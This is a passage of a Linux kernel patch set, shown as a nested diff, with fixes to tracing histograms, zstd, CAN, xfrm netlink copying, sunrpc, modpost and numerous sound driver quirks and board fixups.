+ 	print_actions(m, hist_data, elt);
+@@ -5336,7 +5427,9 @@ static int print_entries(struct seq_file *m,
+ {
+ 	struct tracing_map_sort_entry **sort_entries = NULL;
+ 	struct tracing_map *map = hist_data->map;
+-	int i, n_entries;
++	int i, j, n_entries;
++	struct hist_val_stat *stats = NULL;
++	u64 val;
+ 
+ 	n_entries = tracing_map_sort_entries(map, hist_data->sort_keys,
+ 					     hist_data->n_sort_keys,
+@@ -5344,11 +5437,34 @@ static int print_entries(struct seq_file *m,
+ 	if (n_entries < 0)
+ 		return n_entries;
+ 
++	/* Calculate the max and the total for each field if needed. */
++	for (j = 0; j < hist_data->n_vals; j++) {
++		if (!(hist_data->fields[j]->flags &
++			(HIST_FIELD_FL_PERCENT | HIST_FIELD_FL_GRAPH)))
++			continue;
++		if (!stats) {
++			stats = kcalloc(hist_data->n_vals, sizeof(*stats),
++				       GFP_KERNEL);
++			if (!stats) {
++				n_entries = -ENOMEM;
++				goto out;
++			}
++		}
++		for (i = 0; i < n_entries; i++) {
++			val = tracing_map_read_sum(sort_entries[i]->elt, j);
++			stats[j].total += val;
++			if (stats[j].max < val)
++				stats[j].max = val;
++		}
++	}
++
+ 	for (i = 0; i < n_entries; i++)
+-		hist_trigger_entry_print(m, hist_data,
++		hist_trigger_entry_print(m, hist_data, stats,
+ 					 sort_entries[i]->key,
+ 					 sort_entries[i]->elt);
+ 
++	kfree(stats);
++out:
+ 	tracing_map_destroy_sort_entries(sort_entries, n_entries);
+ 
+ 	return n_entries;
+diff --git a/lib/zstd/common/zstd_deps.h b/lib/zstd/common/zstd_deps.h
+index 7a5bf44839c9c..f06df065dec01 100644
+--- a/lib/zstd/common/zstd_deps.h
++++ b/lib/zstd/common/zstd_deps.h
+@@ -84,7 +84,7 @@ static uint64_t ZSTD_div64(uint64_t dividend, uint32_t divisor) {
+ 
+ #include <linux/kernel.h>
+ 
+-#define assert(x) WARN_ON((x))
++#define assert(x) WARN_ON(!(x))
+ 
+ #endif /* ZSTD_DEPS_ASSERT */
+ #endif /* ZSTD_DEPS_NEED_ASSERT */
+diff --git a/net/can/bcm.c b/net/can/bcm.c
+index 27706f6ace34a..a962ec2b8ba5b 100644
+--- a/net/can/bcm.c
++++ b/net/can/bcm.c
+@@ -941,6 +941,8 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 
+ 			cf = op->frames + op->cfsiz * i;
+ 			err = memcpy_from_msg((u8 *)cf, msg, op->cfsiz);
++			if (err < 0)
++				goto free_op;
+ 
+ 			if (op->flags & CAN_FD_FRAME) {
+ 				if (cf->len > 64)
+@@ -950,12 +952,8 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 					err = -EINVAL;
+ 			}
+ 
+-			if (err < 0) {
+-				if (op->frames != &op->sframe)
+-					kfree(op->frames);
+-				kfree(op);
+-				return err;
+-			}
++			if (err < 0)
++				goto free_op;
+ 
+ 			if (msg_head->flags & TX_CP_CAN_ID) {
+ 				/* copy can_id into frame */
+@@ -1026,6 +1024,12 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 		bcm_tx_start_timer(op);
+ 
+ 	return msg_head->nframes * op->cfsiz + MHSIZ;
++
++free_op:
++	if (op->frames != &op->sframe)
++		kfree(op->frames);
++	kfree(op);
++	return err;
+ }
+ 
+ /*
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index 4177e96170703..848b60c9ef79e 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -1124,8 +1124,6 @@ static void __j1939_session_cancel(struct j1939_session *session,
+ 
+ 	if (session->sk)
+ 		j1939_sk_send_loop_abort(session->sk, session->err);
+-	else
+-		j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ }
+ 
+ static void j1939_session_cancel(struct j1939_session *session,
+@@ -1140,6 +1138,9 @@ static void j1939_session_cancel(struct j1939_session *session,
+ 	}
+ 
+ 	j1939_session_list_unlock(session->priv);
++
++	if (!session->sk)
++		j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ }
+ 
+ static enum hrtimer_restart j1939_tp_txtimer(struct hrtimer *hrtimer)
+@@ -1253,6 +1254,9 @@ static enum hrtimer_restart j1939_tp_rxtimer(struct hrtimer *hrtimer)
+ 			__j1939_session_cancel(session, J1939_XTP_ABORT_TIMEOUT);
+ 		}
+ 		j1939_session_list_unlock(session->priv);
++
++		if (!session->sk)
++			j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ 	}
+ 
+ 	j1939_session_put(session);
+diff --git a/net/hsr/hsr_framereg.c b/net/hsr/hsr_framereg.c
+index 39a6088080e93..a16f0445023aa 100644
+--- a/net/hsr/hsr_framereg.c
++++ b/net/hsr/hsr_framereg.c
+@@ -422,7 +422,7 @@ void hsr_addr_subst_dest(struct hsr_node *node_src, struct sk_buff *skb,
+ 	node_dst = find_node_by_addr_A(&port->hsr->node_db,
+ 				       eth_hdr(skb)->h_dest);
+ 	if (!node_dst) {
+-		if (net_ratelimit())
++		if (port->hsr->prot_version != PRP_V1 && net_ratelimit())
+ 			netdev_err(skb->dev, "%s: Unknown node\n", __func__);
+ 		return;
+ 	}
+diff --git a/net/sunrpc/xprtsock.c b/net/sunrpc/xprtsock.c
+index b3ab6d9d752ea..05aa32696e7c2 100644
+--- a/net/sunrpc/xprtsock.c
++++ b/net/sunrpc/xprtsock.c
+@@ -2153,6 +2153,7 @@ static void xs_tcp_shutdown(struct rpc_xprt *xprt)
+ 	switch (skst) {
+ 	case TCP_FIN_WAIT1:
+ 	case TCP_FIN_WAIT2:
++	case TCP_LAST_ACK:
+ 		break;
+ 	case TCP_ESTABLISHED:
+ 	case TCP_CLOSE_WAIT:
+diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
+index e73f9efc54c12..83f35ecacf24f 100644
+--- a/net/xfrm/xfrm_user.c
++++ b/net/xfrm/xfrm_user.c
+@@ -997,7 +997,9 @@ static int copy_to_user_aead(struct xfrm_algo_aead *aead, struct sk_buff *skb)
+ 		return -EMSGSIZE;
+ 
+ 	ap = nla_data(nla);
+-	memcpy(ap, aead, sizeof(*aead));
++	strscpy_pad(ap->alg_name, aead->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = aead->alg_key_len;
++	ap->alg_icv_len = aead->alg_icv_len;
+ 
+ 	if (redact_secret && aead->alg_key_len)
+ 		memset(ap->alg_key, 0, (aead->alg_key_len + 7) / 8);
+@@ -1017,7 +1019,8 @@ static int copy_to_user_ealg(struct xfrm_algo *ealg, struct sk_buff *skb)
+ 		return -EMSGSIZE;
+ 
+ 	ap = nla_data(nla);
+-	memcpy(ap, ealg, sizeof(*ealg));
++	strscpy_pad(ap->alg_name, ealg->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = ealg->alg_key_len;
+ 
+ 	if (redact_secret && ealg->alg_key_len)
+ 		memset(ap->alg_key, 0, (ealg->alg_key_len + 7) / 8);
+@@ -1028,6 +1031,40 @@ static int copy_to_user_ealg(struct xfrm_algo *ealg, struct sk_buff *skb)
+ 	return 0;
+ }
+ 
++static int copy_to_user_calg(struct xfrm_algo *calg, struct sk_buff *skb)
++{
++	struct nlattr *nla = nla_reserve(skb, XFRMA_ALG_COMP, sizeof(*calg));
++	struct xfrm_algo *ap;
++
++	if (!nla)
++		return -EMSGSIZE;
++
++	ap = nla_data(nla);
++	strscpy_pad(ap->alg_name, calg->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = 0;
++
++	return 0;
++}
++
++static int copy_to_user_encap(struct xfrm_encap_tmpl *ep, struct sk_buff *skb)
++{
++	struct nlattr *nla = nla_reserve(skb, XFRMA_ENCAP, sizeof(*ep));
++	struct xfrm_encap_tmpl *uep;
++
++	if (!nla)
++		return -EMSGSIZE;
++
++	uep = nla_data(nla);
++	memset(uep, 0, sizeof(*uep));
++
++	uep->encap_type = ep->encap_type;
++	uep->encap_sport = ep->encap_sport;
++	uep->encap_dport = ep->encap_dport;
++	uep->encap_oa = ep->encap_oa;
++
++	return 0;
++}
++
+ static int xfrm_smark_put(struct sk_buff *skb, struct xfrm_mark *m)
+ {
+ 	int ret = 0;
+@@ -1083,12 +1120,12 @@ static int copy_to_user_state_extra(struct xfrm_state *x,
+ 			goto out;
+ 	}
+ 	if (x->calg) {
+-		ret = nla_put(skb, XFRMA_ALG_COMP, sizeof(*(x->calg)), x->calg);
++		ret = copy_to_user_calg(x->calg, skb);
+ 		if (ret)
+ 			goto out;
+ 	}
+ 	if (x->encap) {
+-		ret = nla_put(skb, XFRMA_ENCAP, sizeof(*x->encap), x->encap);
++		ret = copy_to_user_encap(x->encap, skb);
+ 		if (ret)
+ 			goto out;
+ 	}
+diff --git a/scripts/mod/modpost.c b/scripts/mod/modpost.c
+index 2c80da0220c32..1dfa80c6b471e 100644
+--- a/scripts/mod/modpost.c
++++ b/scripts/mod/modpost.c
+@@ -1722,7 +1722,7 @@ static void extract_crcs_for_object(const char *object, struct module *mod)
+ 		if (!isdigit(*p))
+ 			continue;	/* skip this line */
+ 
+-		crc = strtol(p, &p, 0);
++		crc = strtoul(p, &p, 0);
+ 		if (*p != '\n')
+ 			continue;	/* skip this line */
+ 
+diff --git a/sound/core/pcm_lib.c b/sound/core/pcm_lib.c
+index 8b6aeb8a78f7d..02fd65993e7e5 100644
+--- a/sound/core/pcm_lib.c
++++ b/sound/core/pcm_lib.c
+@@ -2155,6 +2155,8 @@ int pcm_lib_apply_appl_ptr(struct snd_pcm_substream *substream,
+ 		ret = substream->ops->ack(substream);
+ 		if (ret < 0) {
+ 			runtime->control->appl_ptr = old_appl_ptr;
++			if (ret == -EPIPE)
++				__snd_pcm_xrun(substream);
+ 			return ret;
+ 		}
+ 	}
+diff --git a/sound/pci/asihpi/hpi6205.c b/sound/pci/asihpi/hpi6205.c
+index 27e11b5f70b97..c7d7eff86727f 100644
+--- a/sound/pci/asihpi/hpi6205.c
++++ b/sound/pci/asihpi/hpi6205.c
+@@ -430,7 +430,7 @@ void HPI_6205(struct hpi_message *phm, struct hpi_response *phr)
+ 		pao = hpi_find_adapter(phm->adapter_index);
+ 	} else {
+ 		/* subsys messages don't address an adapter */
+-		_HPI_6205(NULL, phm, phr);
++		phr->error = HPI_ERROR_INVALID_OBJ_INDEX;
+ 		return;
+ 	}
+ 
+diff --git a/sound/pci/hda/patch_ca0132.c b/sound/pci/hda/patch_ca0132.c
+index acde4cd58785e..099722ebaed83 100644
+--- a/sound/pci/hda/patch_ca0132.c
++++ b/sound/pci/hda/patch_ca0132.c
+@@ -4228,8 +4228,10 @@ static int tuning_ctl_set(struct hda_codec *codec, hda_nid_t nid,
+ 
+ 	for (i = 0; i < TUNING_CTLS_COUNT; i++)
+ 		if (nid == ca0132_tuning_ctls[i].nid)
+-			break;
++			goto found;
+ 
++	return -EINVAL;
++found:
+ 	snd_hda_power_up(codec);
+ 	dspio_set_param(codec, ca0132_tuning_ctls[i].mid, 0x20,
+ 			ca0132_tuning_ctls[i].req,
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index 75e1d00074b9f..a889cccdd607c 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -980,7 +980,10 @@ static const struct snd_pci_quirk cxt5066_fixups[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3905, "Lenovo G50-30", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x390b, "Lenovo G50-80", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3975, "Lenovo U300s", CXT_FIXUP_STEREO_DMIC),
+-	SND_PCI_QUIRK(0x17aa, 0x3977, "Lenovo IdeaPad U310", CXT_PINCFG_LENOVO_NOTEBOOK),
++	/* NOTE: we'd need to extend the quirk for 17aa:3977 as the same
++	 * PCI SSID is used on multiple Lenovo models
++	 */
++	SND_PCI_QUIRK(0x17aa, 0x3977, "Lenovo IdeaPad U310", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3978, "Lenovo G50-70", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x397b, "Lenovo S205", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK_VENDOR(0x17aa, "Thinkpad", CXT_FIXUP_THINKPAD_ACPI),
+@@ -1003,6 +1006,7 @@ static const struct hda_model_fixup cxt5066_fixup_models[] = {
+ 	{ .id = CXT_FIXUP_MUTE_LED_GPIO, .name = "mute-led-gpio" },
+ 	{ .id = CXT_FIXUP_HP_ZBOOK_MUTE_LED, .name = "hp-zbook-mute-led" },
+ 	{ .id = CXT_FIXUP_HP_MIC_NO_PRESENCE, .name = "hp-mic-fix" },
++	{ .id = CXT_PINCFG_LENOVO_NOTEBOOK, .name = "lenovo-20149" },
+ 	{}
+ };
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 28ac6c159b2a2..070150bbd3559 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -2631,6 +2631,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x65e5, "Clevo PC50D[PRS](?:-D|-G)?", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65f1, "Clevo PC50HS", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65f5, "Clevo PD50PN[NRT]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
++	SND_PCI_QUIRK(0x1558, 0x66a2, "Clevo PE60RNE", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x67d1, "Clevo PB71[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x67e1, "Clevo PB71[DE][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x67e5, "Clevo PC70D[PRS](?:-D|-G)?", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+@@ -2651,6 +2652,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x96e1, "Clevo P960[ER][CDFN]-K", ALC1220_FIXUP_CLEVO_P950),
+ 	SND_PCI_QUIRK(0x1558, 0x97e1, "Clevo P970[ER][CDFN]", ALC1220_FIXUP_CLEVO_P950),
+ 	SND_PCI_QUIRK(0x1558, 0x97e2, "Clevo P970RC-M", ALC1220_FIXUP_CLEVO_P950),
++	SND_PCI_QUIRK(0x1558, 0xd502, "Clevo PD50SNE", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK_VENDOR(0x1558, "Clevo laptop", ALC882_FIXUP_EAPD),
+ 	SND_PCI_QUIRK(0x161f, 0x2054, "Medion laptop", ALC883_FIXUP_EAPD),
+ 	SND_PCI_QUIRK(0x17aa, 0x3a0d, "Lenovo Y530", ALC882_FIXUP_LENOVO_Y530),
+@@ -9574,6 +9576,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x5101, "Clevo S510WU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x5157, "Clevo W517GU1", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x51a1, "Clevo NS50MU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0x5630, "Clevo NP50RNJS", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70a1, "Clevo NB70T[HJK]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70b3, "Clevo NK70SB", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70f2, "Clevo NH79EPY", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -9608,6 +9611,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x971d, "Clevo N970T[CDF]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa500, "Clevo NL5[03]RU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa600, "Clevo NL50NU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0xa671, "Clevo NP70SN[CDE]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb018, "Clevo NP50D[BE]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb019, "Clevo NH77D[BE]Q", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb022, "Clevo NH77D[DC][QW]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -9708,6 +9712,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x511e, "Thinkpad", ALC298_FIXUP_TPT470_DOCK),
+ 	SND_PCI_QUIRK(0x17aa, 0x511f, "Thinkpad", ALC298_FIXUP_TPT470_DOCK),
+ 	SND_PCI_QUIRK(0x17aa, 0x9e54, "LENOVO NB", ALC269_FIXUP_LENOVO_EAPD),
++	SND_PCI_QUIRK(0x17aa, 0x9e56, "Lenovo ZhaoYang CF4620Z", ALC286_FIXUP_SONY_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1849, 0x1233, "ASRock NUC Box 1100", ALC233_FIXUP_NO_AUDIO_JACK),
+ 	SND_PCI_QUIRK(0x1849, 0xa233, "Positivo Master C6300", ALC269_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x19e5, 0x3204, "Huawei MACH-WX9", ALC256_FIXUP_HUAWEI_MACH_WX9_PINS),
+diff --git a/sound/pci/ymfpci/ymfpci.c b/sound/pci/ymfpci/ymfpci.c
+index 1e198e4d57b8d..82d4e0fda91be 100644
+--- a/sound/pci/ymfpci/ymfpci.c
++++ b/sound/pci/ymfpci/ymfpci.c
+@@ -170,7 +170,7 @@ static int snd_card_ymfpci_probe(struct pci_dev *pci,
+ 		return -ENOENT;
+ 	}
+ 
+-	err = snd_card_new(&pci->dev, index[dev], id[dev], THIS_MODULE,
++	err = snd_devm_card_new(&pci->dev, index[dev], id[dev], THIS_MODULE,
+ 			   sizeof(*chip), &card);
+ 	if (err < 0)
+ 		return err;
+diff --git a/sound/pci/ymfpci/ymfpci_main.c b/sound/pci/ymfpci/ymfpci_main.c
+index c80114c0ad7bf..b492c32ce0704 100644
+--- a/sound/pci/ymfpci/ymfpci_main.c
++++ b/sound/pci/ymfpci/ymfpci_main.c
+@@ -2165,7 +2165,7 @@ static int snd_ymfpci_memalloc(struct snd_ymfpci *chip)
+ 	chip->work_base = ptr;
+ 	chip->work_base_addr = ptr_addr;
+ 	
+-	snd_BUG_ON(ptr + chip->work_size !=
++	snd_BUG_ON(ptr + PAGE_ALIGN(chip->work_size) !=
+ 		   chip->work_ptr->area + chip->work_ptr->bytes);
+ 
+ 	snd_ymfpci_writel(chip, YDSXGR_PLAYCTRLBASE, chip->bank_base_playback_addr);
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index 5d1c58df081ac..e5611f655beda 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -241,7 +241,7 @@ enum {
+ 
+ struct tx_mute_work {
+ 	struct tx_macro *tx;
+-	u32 decimator;
++	u8 decimator;
+ 	struct delayed_work dwork;
+ };
+ 
+@@ -634,7 +634,7 @@ exit:
+ 	return 0;
+ }
+ 
+-static bool is_amic_enabled(struct snd_soc_component *component, int decimator)
++static bool is_amic_enabled(struct snd_soc_component *component, u8 decimator)
+ {
+ 	u16 adc_mux_reg, adc_reg, adc_n;
+ 
+@@ -845,7 +845,7 @@ static int tx_macro_enable_dec(struct snd_soc_dapm_widget *w,
+ 			       struct snd_kcontrol *kcontrol, int event)
+ {
+ 	struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm);
+-	unsigned int decimator;
++	u8 decimator;
+ 	u16 tx_vol_ctl_reg, dec_cfg_reg, hpf_gate_reg, tx_gain_ctl_reg;
+ 	u8 hpf_cut_off_freq;
+ 	int hpf_delay = TX_MACRO_DMIC_HPF_DELAY_MS;
+@@ -1060,7 +1060,8 @@ static int tx_macro_hw_params(struct snd_pcm_substream *substream,
+ 			      struct snd_soc_dai *dai)
+ {
+ 	struct snd_soc_component *component = dai->component;
+-	u32 decimator, sample_rate;
++	u32 sample_rate;
++	u8 decimator;
+ 	int tx_fs_rate;
+ 	struct tx_macro *tx = snd_soc_component_get_drvdata(component);
+ 
+@@ -1124,7 +1125,7 @@ static int tx_macro_digital_mute(struct snd_soc_dai *dai, int mute, int stream)
+ {
+ 	struct snd_soc_component *component = dai->component;
+ 	struct tx_macro *tx = snd_soc_component_get_drvdata(component);
+-	u16 decimator;
++	u8 decimator;
+ 
+ 	/* active decimator not set yet */
+ 	if (tx->active_decimator[dai->id] == -1)
+diff --git a/sound/soc/intel/avs/boards/da7219.c b/sound/soc/intel/avs/boards/da7219.c
+index 02ae542ad7792..a63563594b4cd 100644
+--- a/sound/soc/intel/avs/boards/da7219.c
++++ b/sound/soc/intel/avs/boards/da7219.c
+@@ -111,6 +111,26 @@ static int avs_da7219_codec_init(struct snd_soc_pcm_runtime *runtime)
+ 	return 0;
+ }
+ 
++static int
++avs_da7219_be_fixup(struct snd_soc_pcm_runtime *runrime, struct snd_pcm_hw_params *params)
++{
++	struct snd_interval *rate, *channels;
++	struct snd_mask *fmt;
++
++	rate = hw_param_interval(params, SNDRV_PCM_HW_PARAM_RATE);
++	channels = hw_param_interval(params, SNDRV_PCM_HW_PARAM_CHANNELS);
++	fmt = hw_param_mask(params, SNDRV_PCM_HW_PARAM_FORMAT);
++
++	/* The ADSP will convert the FE rate to 48k, stereo */
++	rate->min = rate->max = 48000;
++	channels->min = channels->max = 2;
++
++	/* set SSP0 to 24 bit */
++	snd_mask_none(fmt);
++	snd_mask_set_format(fmt, SNDRV_PCM_FORMAT_S24_LE);
++	return 0;
++}
++
+ static int avs_create_dai_link(struct device *dev, const char *platform_name, int ssp_port,
+ 			       struct snd_soc_dai_link **dai_link)
+ {
+@@ -142,6 +162,7 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->num_platforms = 1;
+ 	dl->id = 0;
+ 	dl->dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	dl->be_hw_params_fixup = avs_da7219_be_fixup;
+ 	dl->init = avs_da7219_codec_init;
+ 	dl->nonatomic = 1;
+ 	dl->no_pcm = 1;
+diff --git a/sound/soc/intel/avs/boards/max98357a.c b/sound/soc/intel/avs/boards/max98357a.c
+index 921f42caf7e09..183123d08c5a3 100644
+--- a/sound/soc/intel/avs/boards/max98357a.c
++++ b/sound/soc/intel/avs/boards/max98357a.c
+@@ -8,6 +8,7 @@
+ 
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
++#include <sound/pcm_params.h>
+ #include <sound/soc.h>
+ #include <sound/soc-acpi.h>
+ #include <sound/soc-dapm.h>
+@@ -24,6 +25,26 @@ static const struct snd_soc_dapm_route card_base_routes[] = {
+ 	{ "Spk", NULL, "Speaker" },
+ };
+ 
++static int
++avs_max98357a_be_fixup(struct snd_soc_pcm_runtime *runrime, struct snd_pcm_hw_params *params)
++{
++	struct snd_interval *rate, *channels;
++	struct snd_mask *fmt;
++
++	rate = hw_param_interval(params, SNDRV_PCM_HW_PARAM_RATE);
++	channels = hw_param_interval(params, SNDRV_PCM_HW_PARAM_CHANNELS);
++	fmt = hw_param_mask(params, SNDRV_PCM_HW_PARAM_FORMAT);
++
++	/* The ADSP will convert the FE rate to 48k, stereo */
++	rate->min = rate->max = 48000;
++	channels->min = channels->max = 2;
++
++	/* set SSP0 to 16 bit */
++	snd_mask_none(fmt);
++	snd_mask_set_format(fmt, SNDRV_PCM_FORMAT_S16_LE);
++	return 0;
++}
++
+ static int avs_create_dai_link(struct device *dev, const char *platform_name, int ssp_port,
+ 			       struct snd_soc_dai_link **dai_link)
+ {
+@@ -55,6 +76,7 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->num_platforms = 1;
+ 	dl->id = 0;
+ 	dl->dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	dl->be_hw_params_fixup = avs_max98357a_be_fixup;
+ 	dl->nonatomic = 1;
+ 	dl->no_pcm = 1;
+ 	dl->dpcm_playback = 1;
+diff --git a/sound/soc/intel/avs/boards/nau8825.c b/sound/soc/intel/avs/boards/nau8825.c
+index f76909e9f990a..8392d8fac8f9c 100644
+--- a/sound/soc/intel/avs/boards/nau8825.c
++++ b/sound/soc/intel/avs/boards/nau8825.c
+@@ -33,15 +33,15 @@ avs_nau8825_clock_control(struct snd_soc_dapm_widget *w, struct snd_kcontrol *co
+ 		return -EINVAL;
+ 	}
+ 
+-	if (!SND_SOC_DAPM_EVENT_ON(event)) {
++	if (SND_SOC_DAPM_EVENT_ON(event))
++		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_MCLK, 24000000,
++					     SND_SOC_CLOCK_IN);
++	else
+ 		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_INTERNAL, 0, SND_SOC_CLOCK_IN);
+-		if (ret < 0) {
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-			return ret;
+-		}
+-	}
++	if (ret < 0)
++		dev_err(card->dev, "Set sysclk failed: %d\n", ret);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static const struct snd_kcontrol_new card_controls[] = {
+diff --git a/sound/soc/intel/avs/boards/ssm4567.c b/sound/soc/intel/avs/boards/ssm4567.c
+index 9f84c8ab34478..51a8867326b47 100644
+--- a/sound/soc/intel/avs/boards/ssm4567.c
++++ b/sound/soc/intel/avs/boards/ssm4567.c
+@@ -15,7 +15,6 @@
+ #include <sound/soc-acpi.h>
+ #include "../../../codecs/nau8825.h"
+ 
+-#define SKL_NUVOTON_CODEC_DAI	"nau8825-hifi"
+ #define SKL_SSM_CODEC_DAI	"ssm4567-hifi"
+ 
+ static struct snd_soc_codec_conf card_codec_conf[] = {
+@@ -34,41 +33,11 @@ static const struct snd_kcontrol_new card_controls[] = {
+ 	SOC_DAPM_PIN_SWITCH("Right Speaker"),
+ };
+ 
+-static int
+-platform_clock_control(struct snd_soc_dapm_widget *w, struct snd_kcontrol *control, int event)
+-{
+-	struct snd_soc_dapm_context *dapm = w->dapm;
+-	struct snd_soc_card *card = dapm->card;
+-	struct snd_soc_dai *codec_dai;
+-	int ret;
+-
+-	codec_dai = snd_soc_card_get_codec_dai(card, SKL_NUVOTON_CODEC_DAI);
+-	if (!codec_dai) {
+-		dev_err(card->dev, "Codec dai not found\n");
+-		return -EINVAL;
+-	}
+-
+-	if (SND_SOC_DAPM_EVENT_ON(event)) {
+-		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_MCLK, 24000000,
+-					     SND_SOC_CLOCK_IN);
+-		if (ret < 0)
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-	} else {
+-		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_INTERNAL, 0, SND_SOC_CLOCK_IN);
+-		if (ret < 0)
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-	}
+-
+-	return ret;
+-}
+-
+ static const struct snd_soc_dapm_widget card_widgets[] = {
+ 	SND_SOC_DAPM_SPK("Left Speaker", NULL),
+ 	SND_SOC_DAPM_SPK("Right Speaker", NULL),
+ 	SND_SOC_DAPM_SPK("DP1", NULL),
+ 	SND_SOC_DAPM_SPK("DP2", NULL),
+-	SND_SOC_DAPM_SUPPLY("Platform Clock", SND_SOC_NOPM, 0, 0, platform_clock_control,
+-			    SND_SOC_DAPM_PRE_PMU | SND_SOC_DAPM_POST_PMD),
+ };
+ 
+ static const struct snd_soc_dapm_route card_base_routes[] = {
+diff --git a/sound/soc/sof/intel/pci-tng.c b/sound/soc/sof/intel/pci-tng.c
+index f0f6d9ba88037..0b17d1bb225e2 100644
+--- a/sound/soc/sof/intel/pci-tng.c
++++ b/sound/soc/sof/intel/pci-tng.c
+@@ -75,11 +75,7 @@ static int tangier_pci_probe(struct snd_sof_dev *sdev)
+ 
+ 	/* LPE base */
+ 	base = pci_resource_start(pci, desc->resindex_lpe_base) - IRAM_OFFSET;
+-	size = pci_resource_len(pci, desc->resindex_lpe_base);
+-	if (size < PCI_BAR_SIZE) {
+-		dev_err(sdev->dev, "error: I/O region is too small.\n");
+-		return -ENODEV;
+-	}
